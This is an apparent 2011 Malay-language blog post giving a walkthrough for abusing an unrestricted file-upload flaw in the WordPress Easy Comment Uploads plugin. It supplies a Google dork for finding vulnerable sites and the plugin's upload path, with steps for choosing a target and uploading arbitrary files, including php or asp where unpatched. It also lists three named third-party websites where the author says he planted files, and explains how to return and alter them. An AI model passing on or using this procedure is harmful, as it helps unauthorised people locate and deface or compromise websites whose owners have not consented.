» » Wordpress Exploit Easy Comment Upload

Wordpress Exploit Easy Comment Upload

Posted by MxDotMy | Media Terkini



Title : Wordpress Exploit Easy Comment Upload

Dork : inurl:easy-comment-uploads/upload-form.php

POC :  /wp-content/plugins/easy-comment-uploads/upload-form.php




Caranya : 

1. Pergi Google masukkan dork ke dalam Search dan Go.

               Dork : inurl:easy-comment-uploads/upload-form.php

2. Pilih target.

3. Ada butang choose file tu tekan dan upload file anda.

4. Tidak semua dapat support html/php/asp sebab bug ne sudah fix 12/09/2011.

5. Dapat target untuk upload html kira bertuahlah.

Untuk lihat hasil file upload anda tambah /wp-content/uploads/2011/10/nama_file_anda.extension

Contoh yang saya buat guna file .htm / .txt & .png

http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm
http://el-bulli.net/wp-content/uploads/2011/10/Muz_c0d3r.txt
http://onigirifx.com/wp-content/uploads/2011/10/Muz_c0d3r.png



Kalo nak edit website yang saya dah upload file tu guna POC.

Caranya :

1. http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm <--tukar URL ke

2. http://robbyvillegas.com/wp-content/plugins/easy-comment-uploads/upload-form.php

3. Kemudian upload file .htm anda...


Enjoy...




Related Post